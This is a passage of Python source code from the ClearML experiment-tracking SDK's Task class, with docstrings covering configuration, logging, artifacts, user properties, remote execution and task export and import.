raise ValueError("Could not connect configuration file {}, file could not be read".format(
configuration_path.as_posix()))
if multi_config_support:
self._set_configuration(
name=name, description=description,
config_type=configuration_path.suffixes[-1].lstrip('.')
if configuration_path.suffixes and configuration_path.suffixes[-1] else 'file',
config_text=configuration_text)
else:
self._set_model_config(config_text=configuration_text)
return configuration
else:
configuration_text = self._get_configuration_text(name=name) if multi_config_support \
else self._get_model_config_text()
if configuration_text is None:
LoggerRoot.get_base_logger().warning(
"Could not retrieve remote configuration named \'{}\'\n"
"Using default configuration: {}".format(name, str(configuration)))
# update back configuration section
if multi_config_support:
configuration_path = Path(configuration)
if configuration_path.is_file():
with open(configuration_path.as_posix(), 'rt') as f:
configuration_text = f.read()
self._set_configuration(
name=name, description=description,
config_type=configuration_path.suffixes[-1].lstrip('.')
if configuration_path.suffixes and configuration_path.suffixes[-1] else 'file',
config_text=configuration_text)
return configuration
configuration_path = Path(configuration)
fd, local_filename = mkstemp(prefix='clearml_task_config_',
suffix=configuration_path.suffixes[-1] if
configuration_path.suffixes else '.txt')
os.write(fd, configuration_text.encode('utf-8'))
os.close(fd)
if pathlib_Path:
return pathlib_Path(local_filename)
return Path(local_filename) if isinstance(configuration, Path) else local_filename
def connect_label_enumeration(self, enumeration):
# type: (Dict[str, int]) -> Dict[str, int]
"""
Connect a label enumeration dictionary to a Task (experiment) object.
Later, when creating an output model, the model will include the label enumeration dictionary.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
:return: The label enumeration dictionary (JSON).
"""
if not isinstance(enumeration, dict):
raise ValueError("connect_label_enumeration supports only `dict` type, "
"{} is not supported".format(type(enumeration)))
if not running_remotely() or not (self.is_main_task() or self._is_remote_main_task()):
self.set_model_label_enumeration(enumeration)
else:
# pop everything
enumeration.clear()
enumeration.update(self.get_labels_enumeration())
return enumeration
def get_logger(self):
# type: () -> Logger
"""
Get a Logger object for reporting, for this task context. You can view all Logger report output associated with
the Task for which this method is called, including metrics, plots, text, tables, and images, in the
**ClearML Web-App (UI)**.
:return: The Logger for the Task (experiment).
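For example, a minimal reporting sketch (the title/series names and values are placeholders):
.. code-block:: py
    logger = task.get_logger()
    logger.report_scalar(title='loss', series='train', value=0.26, iteration=5)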
"""
return self._get_logger(auto_connect_streams=self._log_to_backend)
def mark_started(self, force=False):
# type: (bool) -> ()
"""
Manually mark a Task as started (happens automatically)
:param bool force: If True the task status will be changed to `started` regardless of the current Task state.
"""
# UI won't let us see metrics if we're not started
self.started(force=force)
self.reload()
def mark_stopped(self, force=False, status_message=None):
# type: (bool, Optional[str]) -> ()
"""
Manually mark a Task as stopped (also used in :meth:`_at_exit`)
:param bool force: If True the task status will be changed to `stopped` regardless of the current Task state.
:param str status_message: Optional, add status change message to the stop request.
This message will be stored as status_message on the Task's info panel
"""
# flush any outstanding logs
self.flush(wait_for_uploads=True)
# mark task as stopped
self.stopped(force=force, status_message=str(status_message) if status_message else None)
def flush(self, wait_for_uploads=False):
# type: (bool) -> bool
"""
Flush any outstanding reports or console logs.
:param bool wait_for_uploads: Wait for all outstanding uploads to complete
- ``True`` - Wait
- ``False`` - Do not wait (default)
"""
# make sure model upload is done
if BackendModel.get_num_results() > 0 and wait_for_uploads:
BackendModel.wait_for_results()
# flush any outstanding logs
if self._logger:
# noinspection PyProtectedMember
self._logger._flush_stdout_handler()
if self.__reporter:
self.__reporter.flush()
if wait_for_uploads:
self.__reporter.wait_for_events()
LoggerRoot.flush()
return True
def reset(self, set_started_on_success=False, force=False):
# type: (bool, bool) -> None
"""
Reset a Task. ClearML reloads a Task after a successful reset.
When a worker executes a Task remotely, the Task does not reset unless
the ``force`` parameter is set to ``True`` (this avoids accidentally clearing logs and metrics).
:param bool set_started_on_success: If successful, automatically set the Task to `started`
- ``True`` - If successful, set to started.
- ``False`` - If successful, do not set to started. (default)
:param bool force: Force a Task reset, even when executing the Task (experiment) remotely in a worker
- ``True`` - Force
- ``False`` - Do not force (default)
"""
if not running_remotely() or not self.is_main_task() or force:
super(Task, self).reset(set_started_on_success=set_started_on_success, force=force)
def close(self):
"""
Close the current Task. Enables you to manually shut down the task.
.. warning::
Only call :meth:`Task.close` if you are certain the Task is not needed.
"""
if self._at_exit_called:
return
# store is_main before we call at_exit, because at_exit will null it
is_main = self.is_main_task()
is_sub_process = self.__is_subprocess()
# wait for repository detection (5 minutes should be a reasonable time to detect all packages)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
self.__shutdown()
# unregister atexit callbacks and signal hooks, if we are the main task
if is_main:
self.__register_at_exit(None)
if not is_sub_process:
# make sure we enable multiple Task.init calls with reporting sub-processes
BackgroundMonitor.clear_main_process(self)
# noinspection PyProtectedMember
Logger._remove_std_logger()
def delete(self, delete_artifacts_and_models=True, skip_models_used_by_other_tasks=True, raise_on_error=False):
# type: (bool, bool, bool) -> bool
"""
Delete the task as well as its output models and artifacts.
Models and artifacts are deleted from their storage locations, each using its URI.
Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are
configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials
are properly configured and that you have delete permission in the related buckets).
:param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True)
:param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True)
:param raise_on_error: If True, an exception will be raised when encountering an error.
If False, an error will be printed and no exception will be raised.
:return: True if the task was deleted successfully.
"""
if not running_remotely() or not self.is_main_task():
return super(Task, self)._delete(
delete_artifacts_and_models=delete_artifacts_and_models,
skip_models_used_by_other_tasks=skip_models_used_by_other_tasks,
raise_on_error=raise_on_error,
)
return False
def register_artifact(self, name, artifact, metadata=None, uniqueness_columns=True):
# type: (str, pandas.DataFrame, Dict, Union[bool, Sequence[str]]) -> None
"""
Register (add) an artifact for the current Task. Registered artifacts are dynamically synchronized with the
**ClearML Server** (backend). If a registered artifact is updated, the update is stored in the
**ClearML Server** (backend). Registered artifacts are primarily used for Data Auditing.
The currently supported registered artifact object type is a pandas.DataFrame.
See also :meth:`Task.unregister_artifact` and :meth:`Task.get_registered_artifacts`.
.. note::
ClearML also supports uploaded artifacts which are one-time uploads of static artifacts that are not
dynamically synchronized with the **ClearML Server** (backend). These static artifacts include
additional object types. For more information, see :meth:`Task.upload_artifact`.
:param str name: The name of the artifact.
.. warning::
If an artifact with the same name was previously registered, it is overwritten.
:param object artifact: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **ClearML Web-App (UI)**, **ARTIFACTS** tab.
:param uniqueness_columns: A Sequence of columns for artifact uniqueness comparison criteria, or the default
value of ``True``. If ``True``, the artifact uniqueness comparison criteria is all the columns,
which is the same as ``artifact.columns``.
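For example, a minimal sketch (the DataFrame contents are placeholders):
.. code-block:: py
    import pandas as pd
    df = pd.DataFrame({'id': [1, 2], 'score': [0.5, 0.7]})
    task.register_artifact(name='train samples', artifact=df, uniqueness_columns=['id'])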
"""
if not isinstance(uniqueness_columns, CollectionsSequence) and uniqueness_columns is not True:
raise ValueError('uniqueness_columns should be a List (sequence) or True')
if isinstance(uniqueness_columns, str):
uniqueness_columns = [uniqueness_columns]
self._artifacts_manager.register_artifact(
name=name, artifact=artifact, metadata=metadata, uniqueness_columns=uniqueness_columns)
def unregister_artifact(self, name):
# type: (str) -> None
"""
Unregister (remove) a registered artifact. This removes the artifact from the watch list that ClearML uses
to synchronize artifacts with the **ClearML Server** (backend).
.. important::
- Calling this method does not remove the artifact from a Task. It only stops ClearML from
monitoring the artifact.
- When this method is called, ClearML immediately takes the last snapshot of the artifact.
"""
self._artifacts_manager.unregister_artifact(name=name)
def get_registered_artifacts(self):
# type: () -> Dict[str, Artifact]
"""
Get a dictionary containing the Task's registered (dynamically synchronized) artifacts (name, artifact object).
.. note::
After calling ``get_registered_artifacts``, you can still modify the registered artifacts.
:return: The registered (dynamically synchronized) artifacts.
"""
return self._artifacts_manager.registered_artifacts
def upload_artifact(
self,
name, # type: str
artifact_object, # type: Union[str, Mapping, pandas.DataFrame, numpy.ndarray, Image.Image, Any]
metadata=None, # type: Optional[Mapping]
delete_after_upload=False, # type: bool
auto_pickle=True, # type: bool
preview=None, # type: Any
wait_on_upload=False, # type: bool
):
# type: (...) -> bool
"""
Upload (add) a static artifact to a Task object. The artifact is uploaded in the background.
The currently supported upload (static) artifact types include:
- string / pathlib2.Path - A path to artifact file. If a wildcard or a folder is specified, then ClearML
creates and uploads a ZIP file.
- dict - ClearML stores a dictionary as ``.json`` file and uploads it.
- pandas.DataFrame - ClearML stores a pandas.DataFrame as ``.csv.gz`` (compressed CSV) file and uploads it.
- numpy.ndarray - ClearML stores a numpy.ndarray as ``.npz`` file and uploads it.
- PIL.Image - ClearML stores a PIL.Image as ``.png`` file and uploads it.
- Any - If called with auto_pickle=True, the object will be pickled and uploaded.
:param str name: The artifact name.
.. warning::
If an artifact with the same name was previously uploaded, then it is overwritten.
:param object artifact_object: The artifact object.
:param dict metadata: A dictionary of key-value pairs for any metadata. This dictionary appears with the
experiment in the **ClearML Web-App (UI)**, **ARTIFACTS** tab.
:param bool delete_after_upload: After the upload, delete the local copy of the artifact
- ``True`` - Delete the local copy of the artifact.
- ``False`` - Do not delete. (default)
:param bool auto_pickle: If True (default) and the artifact_object is not one of the following types:
pathlib2.Path, dict, pandas.DataFrame, numpy.ndarray, PIL.Image, url (string), local_file (string)
the artifact_object will be pickled and uploaded as pickle file artifact (with file extension .pkl)
:param Any preview: The artifact preview
:param bool wait_on_upload: Whether or not the upload should be synchronous, forcing the upload to complete
before continuing.
:return: The status of the upload.
- ``True`` - Upload succeeded.
- ``False`` - Upload failed.
:raise: If the artifact object type is not supported, raise a ``ValueError``.
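For example, a minimal sketch (the artifact names, dictionary, and file path are placeholders):
.. code-block:: py
    task.upload_artifact(name='run config', artifact_object={'seed': 42})
    task.upload_artifact(name='predictions', artifact_object='outputs/predictions.csv')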
"""
return self._artifacts_manager.upload_artifact(
name=name, artifact_object=artifact_object, metadata=metadata, delete_after_upload=delete_after_upload,
auto_pickle=auto_pickle, preview=preview, wait_on_upload=wait_on_upload)
def get_models(self):
# type: () -> Mapping[str, Sequence[Model]]
"""
Return a dictionary with {'input': [], 'output': []} loaded/stored models of the current Task
Input models are files loaded in the task, either manually or automatically logged
Output models are files stored in the task, either manually or automatically logged
Automatically logged frameworks include, for example, TensorFlow, Keras, PyTorch, scikit-learn (joblib), etc.
:return: A dictionary-like object with "input"/"output" keys and input/output properties, pointing to a
list-like object containing Model objects. Each list-like object also acts as a dictionary, mapping
model name to an appropriate model instance.
Example:
.. code-block:: py
{'input': [clearml.Model()], 'output': [clearml.Model()]}
"""
return TaskModels(self)
def is_current_task(self):
# type: () -> bool
"""
.. deprecated:: 0.13.0
This method is deprecated. Use :meth:`Task.is_main_task` instead.
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)
:return: Is this Task object the main execution Task
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self.is_main_task()
def is_main_task(self):
# type: () -> bool
"""
Is this Task object the main execution Task (initially returned by :meth:`Task.init`)
.. note::
If :meth:`Task.init` was never called, this method will *not* create
it, making this test more efficient than:
.. code-block:: py
Task.init() == task
:return: Is this Task object the main execution Task
- ``True`` - Is the main execution Task.
- ``False`` - Is not the main execution Task.
"""
return self is self.__main_task
def set_model_config(self, config_text=None, config_dict=None):
# type: (Optional[str], Optional[Mapping]) -> None
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
self._set_model_config(config_text=config_text, config_dict=config_dict)
def get_model_config_text(self):
# type: () -> str
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_text()
def get_model_config_dict(self):
# type: () -> Dict
"""
.. deprecated:: 0.14.1
Use :meth:`Task.connect_configuration` instead.
"""
return self._get_model_config_dict()
def set_model_label_enumeration(self, enumeration=None):
# type: (Optional[Mapping[str, int]]) -> ()
"""
Set the label enumeration for the Task object before creating an output model.
Later, when creating an output model, the model will inherit these properties.
:param dict enumeration: A label enumeration dictionary of string (label) to integer (value) pairs.
For example:
.. code-block:: javascript
{
'background': 0,
'person': 1
}
"""
super(Task, self).set_model_label_enumeration(enumeration=enumeration)
def get_last_iteration(self):
# type: () -> int
"""
Get the last reported iteration, which is the last iteration for which the Task reported a metric.
.. note::
The maximum reported iteration is not in the local cache. This method
sends a request to the **ClearML Server** (backend).
:return: The last reported iteration number.
"""
self._reload_last_iteration()
return max(self.data.last_iteration or 0, self.__reporter.max_iteration if self.__reporter else 0)
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set initial iteration, instead of zero. Useful when continuing training from previous checkpoints
:param int offset: Initial iteration (at starting point)
:return: Newly set initial offset.
"""
return super(Task, self).set_initial_iteration(offset=offset)
def get_initial_iteration(self):
# type: () -> int
"""
Return the initial iteration offset, default is 0
Useful when continuing training from previous checkpoints
:return: Initial iteration offset.
"""
return super(Task, self).get_initial_iteration()
def get_last_scalar_metrics(self):
# type: () -> Dict[str, Dict[str, Dict[str, float]]]
"""
Get the last scalar metrics which the Task reported. This is a nested dictionary, ordered by title and series.
For example:
.. code-block:: javascript
{
'title': {
'series': {
'last': 0.5,
'min': 0.1,
'max': 0.9
}
}
}
:return: The last scalar metrics.
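Example (a minimal usage sketch; 'title' and 'series' are placeholders for metrics you actually reported):
.. code-block:: py
    metrics = task.get_last_scalar_metrics()
    last_value = metrics['title']['series']['last']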
"""
self.reload()
metrics = self.data.last_metrics
scalar_metrics = dict()
for i in metrics.values():
for j in i.values():
scalar_metrics.setdefault(j['metric'], {}).setdefault(
j['variant'], {'last': j['value'], 'min': j['min_value'], 'max': j['max_value']})
return scalar_metrics
def get_parameters_as_dict(self):
# type: () -> Dict
"""
Get the Task parameters as a raw nested dictionary.
.. note::
The values are not parsed. They are returned as is.
"""
return naive_nested_from_flat_dictionary(self.get_parameters())
def set_parameters_as_dict(self, dictionary):
# type: (Dict) -> None
"""
Set the parameters for the Task object from a dictionary. The dictionary can be nested.
This does not link the dictionary to the Task object. It does a one-time update. This
is unlike the :meth:`Task.connect` method, which links the object to the Task.
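Example (a minimal sketch; the section and parameter names are placeholders):
.. code-block:: py
    task = Task.init(project_name='examples', task_name='set parameters')
    task.set_parameters_as_dict({'General': {'batch_size': 32, 'learning_rate': 0.001}})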
"""
self._arguments.copy_from_dict(flatten_dictionary(dictionary))
def get_user_properties(self, value_only=False):
# type: (bool) -> Dict[str, Union[str, dict]]
"""
Get user properties for this task.
Returns a dictionary mapping user property name to user property details dict.
:param value_only: If True, returned user property details will be a string representing the property value.
"""
if not Session.check_min_api_version("2.9"):
self.log.info("User properties are not supported by the server")
return {}
section = "properties"
params = self._hyper_params_manager.get_hyper_params(
sections=[section], projector=attrgetter("value") if value_only else None
)
return dict(params.get(section, {}))
def set_user_properties(
self,
*iterables, # type: Union[Mapping[str, Union[str, dict, None]], Iterable[dict]]
**properties # type: Union[str, dict, int, float, None]
):
# type: (...) -> bool
"""
Set user properties for this task.
A user property can contain the following fields (all of type string):
name / value / description / type
Examples:
task.set_user_properties(backbone='great', stable=True)
task.set_user_properties(backbone={"type": int, "description": "network type", "value": "great"}, )
task.set_user_properties(
{"name": "backbone", "description": "network type", "value": "great"},
{"name": "stable", "description": "is stable", "value": True},
)
:param iterables: Properties iterables, each can be:
* A dictionary mapping a string key (name) to either a string value (value) or a dict (property details). If the
value is a dict, it must contain a "value" field. For example:
.. code-block:: javascript
{
"property_name": {"description": "This is a user property", "value": "property value"},
"another_property_name": {"description": "This is user property", "value": "another value"},
"yet_another_property_name": "some value"
}
* An iterable of dicts (each representing property details). Each dict must contain a "name" field and a
"value" field. For example:
.. code-block:: javascript
[
{
"name": "property_name",
"description": "This is a user property",
"value": "property value"
},
{
"name": "another_property_name",
"description": "This is another user property",
"value": "another value"
}
]
:param properties: Additional properties keyword arguments. Key is the property name, and value can be
a string (property value) or a dict (property details). If the value is a dict, it must contain a "value"
field. For example:
.. code-block:: javascript
{
"property_name": "string as property value",
"another_property_name": {
"type": "string",
"description": "This is user property",
"value": "another value"
}
}
"""
if not Session.check_min_api_version("2.9"):
self.log.info("User properties are not supported by the server")
return False
return self._hyper_params_manager.edit_hyper_params(
iterables=list(properties.items()) + (
list(iterables.items()) if isinstance(iterables, dict) else list(iterables)),
replace='none',
force_section="properties",
)
def get_script(self):
# type: (...) -> Mapping[str, Optional[str]]
"""
Get task's script details.
Returns a dictionary containing the script details.
:return: Dictionary with script properties e.g.
{
'working_dir': 'examples/reporting',
'entry_point': 'artifacts.py',
'branch': 'master',
'repository': 'https://github.com/allegroai/clearml.git'
}
"""
script = self.data.script
return {
"working_dir": script.working_dir,
"entry_point": script.entry_point,
"branch": script.branch,
"repository": script.repository
}
def set_script(
self,
repository=None, # type: Optional[str]
branch=None, # type: Optional[str]
commit=None, # type: Optional[str]
diff=None, # type: Optional[str]
working_dir=None, # type: Optional[str]
entry_point=None, # type: Optional[str]
):
# type: (...) -> None
"""
Set task's script.
Examples:
task.set_script(repository='https://github.com/allegroai/clearml.git',
branch='main',
working_dir='examples/reporting',
entry_point='artifacts.py')
:param repository: Optional, URL of the remote repository. Use an empty string ("") to clear the repository entry.
:param branch: Optional, select a specific repository branch / tag. Use an empty string ("") to clear the branch entry.
:param commit: Optional, set a specific git commit id. Use an empty string ("") to clear the commit id entry.
:param diff: Optional, set the "git diff" section. Use an empty string ("") to clear the git-diff entry.
:param working_dir: Optional, working directory to launch the script from.
:param entry_point: Optional, path of the entry point to execute within the repository.
"""
self.reload()
script = self.data.script
if repository is not None:
script.repository = str(repository) or None
if branch is not None:
script.branch = str(branch) or None
if script.tag:
script.tag = None
if commit is not None:
script.version_num = str(commit) or None
if diff is not None:
script.diff = str(diff) or None
if working_dir is not None:
script.working_dir = str(working_dir)
if entry_point is not None:
script.entry_point = str(entry_point)
# noinspection PyProtectedMember
self._update_script(script=script)
def delete_user_properties(self, *iterables):
# type: (Iterable[Union[dict, Iterable[str, str]]]) -> bool
"""
Delete user properties for this task.
:param iterables: Iterables of property keys. Each is an iterable whose values each represent
a user property entry to delete. Supported value formats:
* A dictionary containing 'section' and 'name' fields
* An iterable (e.g. tuple, list etc.) whose first two items denote 'section' and 'name'
"""
if not Session.check_min_api_version("2.9"):
self.log.info("User properties are not supported by the server")
return False
return self._hyper_params_manager.delete_hyper_params(*iterables)
def set_base_docker(
self,
docker_cmd=None, # type: Optional[str]
docker_image=None, # type: Optional[str]
docker_arguments=None, # type: Optional[Union[str, Sequence[str]]]
docker_setup_bash_script=None # type: Optional[Union[str, Sequence[str]]]
):
# type: (...) -> ()
"""
Set the base docker image for this experiment.
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely, the call is ignored.
:param docker_cmd: Deprecated! A compound docker container image + arguments
(example: 'nvidia/cuda:11.1 -e test=1'). Use the specific ``docker_image`` / ``docker_arguments`` arguments instead.
:param docker_image: docker container image (example: 'nvidia/cuda:11.1')
:param docker_arguments: docker execution parameters (example: '-e ENV=1')
:param docker_setup_bash_script: bash script to run at the
beginning of the docker before launching the Task itself. example: ['apt update', 'apt-get install -y gcc']
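Example (a minimal sketch; the image, arguments and setup script are illustrative only):
.. code-block:: py
    task = Task.init(project_name='examples', task_name='base docker')
    task.set_base_docker(
        docker_image='nvidia/cuda:11.1',
        docker_arguments='-e ENV=1',
        docker_setup_bash_script=['apt update', 'apt-get install -y gcc']
    )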
"""
if not self.running_locally() and self.is_main_task():
return
super(Task, self).set_base_docker(
docker_cmd=docker_cmd or docker_image,
docker_arguments=docker_arguments,
docker_setup_bash_script=docker_setup_bash_script
)
def set_resource_monitor_iteration_timeout(self, seconds_from_start=1800):
# type: (float) -> bool
"""
Set the ResourceMonitor maximum duration (in seconds) to wait until first scalar/plot is reported.
If timeout is reached without any reporting, the ResourceMonitor will start reporting machine statistics based
on seconds from Task start time (instead of based on iteration)
:param seconds_from_start: Maximum number of seconds to wait for scalar/plot reporting before defaulting
to machine statistics reporting based on seconds from experiment start time
:return: True if success
"""
if not self._resource_monitor:
return False
self._resource_monitor.wait_for_first_iteration = seconds_from_start
self._resource_monitor.max_check_first_iteration = seconds_from_start
return True
def execute_remotely(self, queue_name=None, clone=False, exit_process=True):
# type: (Optional[str], bool, bool) -> Optional[Task]
"""
If the task is running locally (i.e., not by ``clearml-agent``), then clone the Task and enqueue it for remote
execution; or, stop the execution of the current Task, reset its state, and enqueue it. If ``exit_process==True``,
*exit* this process.
.. note::
If the task is running remotely (i.e., ``clearml-agent`` is executing it), this call is a no-op
(i.e., does nothing).
:param queue_name: The queue name used for enqueueing the task. If ``None``, this call exits the process
without enqueuing the task.
:param clone: Clone the Task and execute the newly cloned Task
The values are:
- ``True`` - A cloned copy of the Task will be created, and enqueued, instead of this Task.
- ``False`` - The Task will be enqueued.
:param exit_process: The function call will leave the calling process at the end
- ``True`` - Exit the process (exit(0)).
- ``False`` - Do not exit the process.
.. warning::
If ``clone==False``, then ``exit_process`` must be ``True``.
:return Task: The Task object of the newly generated remotely executing Task
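Example (a minimal sketch; 'default' is a placeholder for an existing agent queue):
.. code-block:: py
    task = Task.init(project_name='examples', task_name='remote run')
    # running locally: enqueue this task on the 'default' queue and exit the process
    # running under clearml-agent: this call is a no-op and execution continues below
    task.execute_remotely(queue_name='default')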
"""
# do nothing, we are running remotely
if running_remotely() and self.is_main_task():
return None
if not self.is_main_task():
LoggerRoot.get_base_logger().warning(
"Calling task.execute_remotely is only supported on main Task (created with Task.init)\n"
"Defaulting to self.enqueue(queue_name={})".format(queue_name)
)
if not queue_name:
raise ValueError("queue_name must be provided")
enqueue_task = Task.clone(source_task=self) if clone else self
Task.enqueue(task=enqueue_task, queue_name=queue_name)
return
if not clone and not exit_process:
raise ValueError(
"clone==False and exit_process==False is not supported. "
"Task enqueuing itself must exit the process afterwards.")
# make sure we analyze the process
if self.status in (Task.TaskStatusEnum.in_progress,):
if clone:
# wait for repository detection (5 minutes should be reasonable time to detect all packages)
self.flush(wait_for_uploads=True)
if self._logger and not self.__is_subprocess():
self._wait_for_repo_detection(timeout=300.)
else:
# close ourselves (it will make sure the repo is updated)
self.close()
# clone / reset Task
if clone:
task = Task.clone(self)
else:
task = self
# check if the server supports enqueueing aborted/stopped Tasks
if Session.check_min_api_server_version('2.13'):
self.mark_stopped(force=True)
else:
self.reset()
# enqueue ourselves
if queue_name:
Task.enqueue(task, queue_name=queue_name)
LoggerRoot.get_base_logger().warning(
'Switching to remote execution, output log page {}'.format(task.get_output_log_web_page()))
else:
# Remove the development system tag
system_tags = [t for t in task.get_system_tags() if t != self._development_tag]
self.set_system_tags(system_tags)
# if we leave the Task out there, it makes sense to make it editable.
self.reset(force=True)
# leave this process.
if exit_process:
LoggerRoot.get_base_logger().warning('Terminating local execution process')
leave_process(0)
return task
def create_function_task(self, func, func_name=None, task_name=None, **kwargs):
# type: (Callable, Optional[str], Optional[str], **Optional[Any]) -> Optional[Task]
"""
Create a new task, and call ``func`` with the specified kwargs.
One can think of this call as remote forking, where the newly created instance is the new Task
calling the specified func with the appropriate kwargs, exiting once the func terminates.
Notice that a remotely executed function cannot create another child remotely executed function.
.. note::
- Must be called from the main Task, i.e. the one created by Task.init(...)
- The remote Tasks inherits the environment from the creating Task
- In the remote Task, the entrypoint is the same as the creating Task
- In the remote Task, the execution is the same until reaching this function call
:param func: A function to execute remotely as a single Task.
On the remotely executed Task the entry-point and the environment are copied from this
calling process; only this function call redirects the execution flow to the called func,
alongside the passed arguments.
:param func_name: A unique identifier of the function. Default: the function name without the namespace.
For example, Class.foo() becomes 'foo'
:param task_name: The newly created Task name. Default: the calling Task name + function name
:param kwargs: Named arguments for the target function.
These arguments will appear under the Task's configuration, in the "Function" section
:return Task: Return the newly created Task or None if running remotely and execution is skipped
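Example (a minimal sketch; ``my_func`` and its arguments are hypothetical):
.. code-block:: py
    def my_func(x=1, y=2):
        return x + y
    task = Task.init(project_name='examples', task_name='function task demo')
    func_task = task.create_function_task(my_func, func_name='my_func', task_name='run my_func', x=10, y=20)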
"""
if not self.is_main_task():
raise ValueError("Only the main Task object can call create_function_task()")
if not callable(func):
raise ValueError("func must be callable")
if not Session.check_min_api_version('2.9'):
raise ValueError("Remote function execution is not supported, "
"please upgrade to the latest server version")
func_name = str(func_name or func.__name__).strip()
if func_name in self._remote_functions_generated:
raise ValueError("Function name must be unique, a function by the name '{}' "
"was already created by this Task.".format(func_name))
section_name = 'Function'
tag_name = 'func'
func_marker = '__func_readonly__'
# sanitize the dict, leave only basic types that we might want to override later in the UI
func_params = {k: v for k, v in kwargs.items() if verify_basic_value(v)}
func_params[func_marker] = func_name
# do not query if we are running locally, there is no need.
task_func_marker = self.running_locally() or self.get_parameter('{}/{}'.format(section_name, func_marker))
# if we are running locally, or if we are running remotely but we are not one of the forked tasks
# condition explained:
# (1) running in development mode creates all the forked tasks
# (2) running remotely but this is not one of the forked tasks (i.e. it is missing the fork tag attribute)
if self.running_locally() or not task_func_marker:
self._wait_for_repo_detection(300)
task = self.clone(self, name=task_name or '{} <{}>'.format(self.name, func_name), parent=self.id)
task.set_system_tags((task.get_system_tags() or []) + [tag_name])
task.connect(func_params, name=section_name)
self._remote_functions_generated[func_name] = task.id
return task
# check if we are one of the generated functions and if this is us;
# if we are not the correct function, do nothing and leave
if task_func_marker != func_name:
self._remote_functions_generated[func_name] = len(self._remote_functions_generated) + 1
return
# mark this is us:
self._remote_functions_generated[func_name] = self.id
# this is us for sure, let's update the arguments and call the function
self.connect(func_params, name=section_name)
func_params.pop(func_marker, None)
kwargs.update(func_params)
func(**kwargs)
# This is it, leave the process
leave_process(0)
def wait_for_status(
self,
status=(_Task.TaskStatusEnum.completed, _Task.TaskStatusEnum.stopped, _Task.TaskStatusEnum.closed),
raise_on_status=(_Task.TaskStatusEnum.failed,),
check_interval_sec=60.,
):
# type: (Iterable[Task.TaskStatusEnum], Optional[Iterable[Task.TaskStatusEnum]], float) -> ()
"""
Wait for a task to reach a defined status.
:param status: Statuses to wait for. Defaults to ('completed', 'stopped', 'closed')
:param raise_on_status: Raise a RuntimeError if the status of the task matches one of these values.
Defaults to ('failed',).
:param check_interval_sec: Interval in seconds between two checks. Defaults to 60 seconds.
:raise: RuntimeError if the status is one of {raise_on_status}.
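Example (a minimal sketch; the task id is a placeholder):
.. code-block:: py
    task = Task.get_task(task_id='aabbcc')
    # block until the task is completed/stopped/closed, polling every 30 seconds
    task.wait_for_status(check_interval_sec=30.)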
"""
stopped_status = list(status) + (list(raise_on_status) if raise_on_status else [])
while self.status not in stopped_status:
time.sleep(check_interval_sec)
if raise_on_status and self.status in raise_on_status:
raise RuntimeError("Task {} has status: {}.".format(self.task_id, self.status))
# make sure we have the Task object
self.reload()
def export_task(self):
# type: () -> dict
"""
Export the Task's configuration into a dictionary (for serialization purposes).
A Task can then be copied/modified by calling Task.import_task()
Notice: the exported data does not include the Task's outputs, such as results
(scalars/plots etc.) or Task artifacts/models.
:return: Dictionary of the Task's configuration.
"""
self.reload()
export_data = self.data.to_dict()
export_data.pop('last_metrics', None)
export_data.pop('last_iteration', None)
export_data.pop('status_changed', None)
export_data.pop('status_reason', None)
export_data.pop('status_message', None)
export_data.get('execution', {}).pop('artifacts', None)
export_data.get('execution', {}).pop('model', None)
export_data['project_name'] = self.get_project_name()
export_data['session_api_version'] = self.session.api_version
return export_data
def update_task(self, task_data):
# type: (dict) -> bool
"""
Update current task with configuration found on the task_data dictionary.
See also export_task() for retrieving Task configuration.
:param task_data: dictionary with full Task configuration
:return: return True if Task update was successful
"""
return bool(self.import_task(task_data=task_data, target_task=self, update=True))
@classmethod
def import_task(cls, task_data, target_task=None, update=False):
# type: (dict, Optional[Union[str, Task]], bool) -> Optional[Task]
"""
Import (create) Task from previously exported Task configuration (see Task.export_task)
Can also be used to edit/update an existing Task (by passing `target_task` and `update=True`).
:param task_data: dictionary of a Task's configuration
:param target_task: Import task_data into an existing Task. Can be either task_id (str) or Task object.
:param update: If True, merge task_data with current Task configuration.
:return: The imported (or updated) Task object, or None if the operation failed.
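Example (a minimal round-trip sketch together with :meth:`Task.export_task`; the task id is a placeholder):
.. code-block:: py
    source_task = Task.get_task(task_id='aabbcc')
    task_data = source_task.export_task()
    copied_task = Task.import_task(task_data)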
"""
# restore original API version (otherwise, we might not be able to restore the data correctly)
force_api_version = task_data.get('session_api_version') or None
original_api_version = Session.api_version
original_force_max_api_version = Session.force_max_api_version
if force_api_version:
Session.force_max_api_version = str(force_api_version)
if not target_task:
project_name = task_data.get('project_name') or Task._get_project_name(task_data.get('project', ''))
target_task = Task.create(project_name=project_name, task_name=task_data.get('name', None))
elif isinstance(target_task, six.string_types):
target_task = Task.get_task(task_id=target_task)
elif not isinstance(target_task, Task):
raise ValueError(
"`target_task` must be either Task id (str) or Task object, "
"received `target_task` type {}".format(type(target_task)))
target_task.reload()
cur_data = target_task.data.to_dict()
cur_data = merge_dicts(cur_data, task_data) if update else dict(**task_data)
cur_data.pop('id', None)
cur_data.pop('project', None)
# noinspection PyProtectedMember
valid_fields = list(tasks.EditRequest._get_data_props().keys())
cur_data = dict((k, cur_data[k]) for k in valid_fields if k in cur_data)
res = target_task._edit(**cur_data)
if res and res.ok():
target_task.reload()
else:
target_task = None
# restore the current api version, and return a new Task instance bound to the current version
if force_api_version:
Session.force_max_api_version = original_force_max_api_version
Session.api_version = original_api_version
if target_task:
target_task = Task.get_task(task_id=target_task.id)
return target_task
@classmethod
def import_offline_session(cls, session_folder_zip):
# type: (str) -> (Optional[str])
"""
Upload an offline session (execution) of a Task.
A full Task execution includes repository details, installed packages, artifacts, logs, metrics and debug samples.
